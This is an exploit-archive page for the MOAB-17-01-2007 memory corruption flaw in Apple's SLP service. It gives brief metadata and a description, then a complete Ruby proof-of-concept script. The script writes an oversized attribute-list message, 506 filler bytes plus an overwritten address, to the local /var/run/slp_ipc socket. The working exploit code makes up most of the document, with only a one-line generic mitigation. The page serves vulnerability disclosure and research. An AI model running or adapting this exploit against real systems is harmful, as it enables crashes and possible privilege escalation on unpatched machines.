Proof of Concept for MOAB-17-01-2007

vendor:

by:

Lance M. Havok, Kevin Finisterre

7.5

CVSS

HIGH

Memory Corruption

119

CWE

Product Name:

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Proof of Concept for MOAB-17-01-2007

This script is a proof of concept for the MOAB-17-01-2007 vulnerability. It sends a malicious payload to a target path, causing a memory corruption. The payload consists of repetitive 'X' characters followed by a memory address. The script then creates a socket connection and writes the payload to the socket. The vulnerability was originally reported to Apple by Kevin Finisterre on 08/02/2006.

Mitigation:

Apply the necessary patches and updates provided by the vendor.

Source

Exploit-DB raw data:

#!/usr/bin/ruby
# (c) Copyright 2006 Lance M. Havok	  <lmh [at] info-pull.com>
#    			           Kevin Finisterre <kf_lists [at] digitalmunition.com>
# All pwnage reserved.
#
# Proof of concept for MOAB-17-01-2007
# http://projects.info-pull.com/moab/MOAB-17-01-2007.html
#
# Originally reported to Apple by Kevin, on 08/02/2006.

require 'socket'

target_path = (ARGV[0] || '/var/run/slp_ipc')
slp_socket	= UNIXSocket.open(target_path)

payload =   ("\x58" * 506)
payload <<  [0xdeadbeef].pack("V")            # ...it expects a valid mem. address (ex. 0xbffff398)

stream  = "\x01"                            + # SrvRqst = 1
          "\x00\x13"                        + # Length of remaining fields? (up to attr-list)
          "\x04\x00\x00\x00\x00\x00\x00"    +
          "\x00\x02\x00\x00"                + # length of scope-list string
          "\x78\x78"                        + # <scope-list>
          "\xff\x03\x00\x00"                + # length of attr-list string 0x3ff = 1023 in hex.
          (payload)                           # <attr-list>

slp_socket.write stream
slp_socket.close

# milw0rm.com [2007-01-18]